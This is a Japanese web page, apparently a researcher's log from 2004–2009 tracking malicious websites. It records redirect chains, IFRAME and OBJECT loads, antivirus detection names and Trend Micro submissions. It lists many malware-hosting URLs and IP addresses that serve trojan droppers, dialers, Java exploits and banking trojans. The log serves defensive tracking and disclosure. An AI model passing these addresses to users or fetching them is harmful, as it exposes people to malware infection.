今日、その結果の連絡があり、ウィルス名:DIAL_RAS.GP として検出するよう対応した、とのこと。 2006/08/12 にDLしたファイルからウィルス名:DIAL_RAS.GP を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとウィルス未検出。 恐らく、新しいファイルに随時置き換えられるURLと推測される。 |
[2006/09/07] | 2006/08/20 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.DE として検出するよう対応、とのこと。 2006/08/20 にDLしたファイルからウィルス名:CHM_CODEBASE.DE を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:CHM_CODEBASE.DE を検出することを確認。 |
[2006/10/13] | 2006/10/11 の時点でバスター無反応であった。ファイルが置き換えられている。
2006/10/11 にトレンドマイクロ社に再提出。 今日、その結果の連絡があり、ウィルス名:CHM_DROPPER.BRP として検出するよう対応、とのこと。 実際に 2006/10/11 にDLしたファイルからウィルス名:CHM_DROPPER.BRP を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。既にファイルが置き換えられている。 |
[2006/10/24] | 2006/10/18 時点でバスター無反応であった。ファイルが置き換えられている。
2006/10/18 にトレンドマイクロ社にファイルを再提出。 今日、その結果の連絡があり、ウィルス名:CHM_SMALL.DPT として検出するよう対応、とのこと。 実際に 2006/10/18 にDLしたファイルからウィルス名:CHM_SMALL.DPT を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応であった。早くもファイルが置き換えられている。 |
[2005/05/22] | 踏んですぐにはウィルス反応しないが、数秒後にウィルス名:JAVA_BYTEVER.A を検出。
IFRAMEタグを使い、以下の2つのURLを呼び出している。詳細はこれら2つのURL解説を参照。 //69.50.177.102/x125/count3.htm //69.50.177.102/x125/count5.htm |
[2005/05/22] | ウィルス名:JAVA_BYTEVER.A |
[2005/05/22] | 以下のURLファイルと関連している。踏んでもセキュリティ環境の度合いにより、有害の場合もある。
//69.50.177.102/x125/classload.jar ← ウィルス名:JAVA_BYTEVER.A //69.50.177.102/x125/runsvc34.exe ← ウィルス有り。詳細はこのURL解説を参照。 |
[2005/05/22] | 踏むといきなり これ を表示。
「はい」を選ぶと、ウィンドウが閉じてそれでおわり。 「いいえ」を選ぶと真っ白なページを表示。しかし、ソースを見ると何かある模様。 調べると何かを実行しようとするスクリプトらしい。 //69.50.177.102/x125/runsvc36.exe と関連付けられている。詳細はこのURL解説も参照。 |
[2005/10/21] | お寄せ頂いた情報は以下の「」内。
「ウィンドウがいきなり閉じる他に異常はありませんでした。」 |
[2005/05/22] | バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。exeの正体はトロイの木馬。
AntiVir → TR/Dldr.VBS.Iwi.G.1 Avast → Win32:Trojano-1278 AVG Antivirus → Dropper.Agent.5.AG BitDefender → Trojan.Dropper.Agent.II ClamAV → Trojan.Dropper.Agent-6 Dr.Web → Trojan.Click.345 Fortinet → W32/Agent.II-tr Kaspersky → Trojan-Dropper.Win32.Small.zp mks_vir → Trojan.Dropper.Agent.Ii NOD32 → Win32/TrojanDropper.Agent.II Norman Virus Control → W32/Agent.CVM VBA32 → Trojan-Dropper.Win32.Agent.ii |
[2005/05/25] | バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。
BitDefender → Trojan.Dialer.HT ClamAV → Dialer-306 Dr.Web → Trojan.DownLoader.2044 Kaspersky → Trojan.Win32.Dialer.ht mks_vir → Win32.4 NOD32 → Win32/Dialer.NAD Norman Virus Control → W32/Dialer VBA32 → Embedded.Trojan-Downloader.Win32.Agent.li |
[2005/05/22] | バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。exeの正体はダイヤラー。
BitDefender → Trojan.Dialer.HT ClamAV → Dialer-306 Dr.Web → Trojan.DownLoader.2044 Kaspersky → Trojan.Win32.Dialer.ht mks_vir → Win32.4 (probable variant) NOD32 → Win32/Dialer.NAD VBA32 → Embedded.Trojan-Downloader.Win32.Agent.li |
[2005/04/05] | 踏むと真っ青なページ。AxtiveX を要求される。
「 1/gdnJP33.exe 」なるものをDLされるらしいが、落ちてこなかった。 |
[2005/06/09] | ウィルス名:JS_PSYME.AF+JAVA_BYTEVER.A+JAVA_BYTEVER.K
真っ青なページだが、このセキュリティ警告 を表示する。 |
[2005/05/22] | 真っ青なページだが、左上のほうに何か別のURLを表示しようとしている。
ウィルス名:TROJ_ANICMOO.G+JAVA_BYTEVER.A+JAVA_BYTEVER.C 。このセキュリティ警告 を表示。 object実行で //69.50.182.94/1/rdgJP1342.exe を実行しようとしている。 IFRAMEタグを使い、//69.50.161.142/inc/nan11.html を呼び出している。それぞれのURL解説を参照。 |
[2005/07/05] | OBJECTタグで1を落とそうとしてくる。また、IFRAMEタグで2を呼び出す。
1、//69.50.182.94/1/gdnJP1932.exe ← ダイヤラー。 2、//www.xybererotica.com/lala/ ← バスター無反応。 |
[2005/05/25] | 真っ青なページだが、左上のほうに何かを呼び出している。それは以下。
//69.50.182.94/1/gdnJP1944.exe |
[2005/06/04] | ウィルス名:JAVA_BYTEVER.A+PE_BUBE.A-O+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1
踏むと真っ白なページだが、左上のほうに小さな黒い点が並んでいる。それはIFRAMEタグで以下のURLを呼び出しているものである。それぞれのURL解説も参照。 //crazy-toolbar.com/new2/web.php?account=encry //crazy-toolbar.com/new11/accencry/web.php?account=encry //crazy-toolbar.com/new12/web.php?account=encry //crazy-toolbar.com/new4/accencry/web.php //crazy-toolbar.com/new13/accencry/web.php //crazy-toolbar.com/new10/web.php?account=encry //crazy-toolbar.com/new7/web.php?account=encry //crazy-toolbar.com/new6/web.php?account=encry |
[2004/08/10] | ウィルス名:HTML_MHTREDIR.H 。//www.ultraload.net/load.html に飛ぶ。 |
[2006/03/05] | 何回か確認すると、1回目の確認では以下の @ に飛び、2回目以降の確認では A に飛んだ。
@、//216.255.186.77/split.php?id=hangall ← このURL List解説を参照。 A、//terabyteofporn.com/?adv=nicket ← 真っ白なページだが、何かある模様。バスターは無反応。 |
[2005/07/04] | 踏むと以下の1のURLに飛び、ウィルス名:JS_MHTREDIR.P+JAVA_BYTEVER.A を検出。
同時にIFRAMEタグで2のURLも呼び出している。 1、//www.search-key.net/inse.php?id=hangall 2、//www.vxiframe.biz/adverts/039/1.php |
[2005/10/17] | 再確認。踏むと下のURLに飛び、更にランダムに約90%の確率でウィルスサイトに飛ぶ。
//69.50.190.135/?to=rush&from=redin&type=cns |
[2005/04/09] | ウィルス名:JAVA_BYTEVER.A |
[2005/04/06] | 踏むと以下のどちらかに飛ぶ。ほとんど @ に飛ぶが、稀に A に飛ぶ。
@、//iframedollars.biz/dl/adv428.php ← ウィルス名:TROJ_ANICMOO.D+JAVA_BYTEVER.A+JAVA_BYTEVER.C A、//www.traffic2cash.biz/counter.php?account=adv234 ← ウィルス名:HTML_REDIR.A+JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 |
[2005/05/22] | ウィルス名:TROJ_ANICMOO.G 。踏むとすぐに //qwe.porn-host.org/1.html に飛ぶので、こちらのURL解説も参照。 |
[2005/05/25] | 以下のURLを関連付けられている。
//81.222.131.59/dl/adv659/sploit.anr ← 詳細はこのURL解説を参照。 //81.222.131.59/dl/adv659/x.chm ← 詳細はこのURL解説を参照。 //81.222.131.59/dl/newexpl.php?adv=adv659 ← ページが無い模様。 |
[2005/03/08] | //69.50.166.213/users/john/web/counter.php に飛ぶ。 |
[2005/07/04] | 踏むと以下の1のURLに飛び、ウィルス名:JS_MHTREDIR.P+JAVA_BYTEVER.A を検出。
同時にIFRAMEタグで2のURLも呼び出している。 1、//www.search-key.net/inse.php?id=hangall 2、//www.vxiframe.biz/adverts/039/1.php |
[2005/04/25] | 踏むと次のどれかに飛ぶ。
@、//82.179.166.145/index2.php?aid=x19 ← バスター無反応。 A、//205.252.250.226/zator/adv3006/ ← ウィルス名:JAVA_BYTEVER.A-1 B、//humansfucker.com/sb/index.html ← バスター無反応。 C、//toolbarpartner.com/adverts/r222/index.html ← ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 |
[2005/05/05] | 改めて確認。
IFRAMEタグで//humansfucker.com/sb/allctrsb.phpを呼んでいるが、実際に踏むと以下のどれかに飛ぶ。 何回か踏んで確認。重複分は除外。詳細はそれぞれのURL解説を参照。 //65.125.226.86/traff/down.php?id=211 //toolbarpartner.com/adverts/r222/index.html //205.252.250.226/zator/adv3006/ //82.179.166.145/index2.php?aid=x19 |
[2005/10/17] | 踏むと以下の @ に飛び、すぐに A に飛ぶ。更に A はランダムに約90%の確率でウィルスサイトに飛ぶ。
@、//69.50.190.131/?to=HANGMANIO&from=nubi&type=nubi A、//69.50.190.135/?to=rush&from=redin&type=cns |
[2006/05/05] | 再確認。踏むと以下のどれかに飛ぶ。
@、//game4all.biz/adv/012/new.php ← このURL List解説も参照。 A、//205.252.250.226/zator/adv3006/ ← このURL List解説も参照。 B、//bs.t-redirect.com/tds/rdr.php?id=27 ← 調査中。 |
[2005/10/17] | 踏むと以下のどれかに飛ぶ。そのほとんどがウィルスを検出するURLである。
//85.255.113.22/inc/nan9.html //205.252.250.226/zator/adv3006/ //82.179.166.145/index2.php?aid=x19 //toolbarpartner.com/in.php?wm=r222 //85.255.113.242/adv/012/ |
[2005/03/12] | 真っ白なページだがウィルス名:JAVA_BYTEVER.A を検出。 |
[2005/02/05] | ウィルス名:JAVA_BYTEVER.A |
[2006/07/11] | ウィルス名:TROJ_ONECLICK.A |
[2005/03/12] | 中身はウィルス名:TROJ_ONECLICK.A |
[2006/08/18] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.DRO として検出するよう対応した、とのこと。 2006/08/12 にDLしたファイルからウィルス名:TROJ_DLOADER.DRO を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_DLOADER.DRO を検出することを確認。 |
[2006/08/18] | 2006/08/12 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.CF として検出するよう対応した、とのこと。 2006/08/12 にDLしたファイルからウィルス名:CHM_CODEBASE.CF を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:CHM_CODEBASE.CF を検出することを確認。 |
[2006/08/11] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC |
[2006/08/11] | こんな感じ のページだが、ウィルス名:TROJ_ANICMOO.AB を検出。 |
[2009/08/06] | ファイルサイズ:0.98 MB 。ウィルス名:TROJ_GENERIC.DIT |
[2009/08/06] | ファイルサイズ:1.18 KB 。バスター無反応だが、BitDefender で Trojan.Banker.Delf.YUV を検出。 |
[2009/08/06] | ファイルサイズ:457 KB 。ウィルス名:TSPY_BANCOS.BI |
[2009/08/06] | ファイルサイズ:759 KB 。ウィルス名:TROJ_BANKMO.S |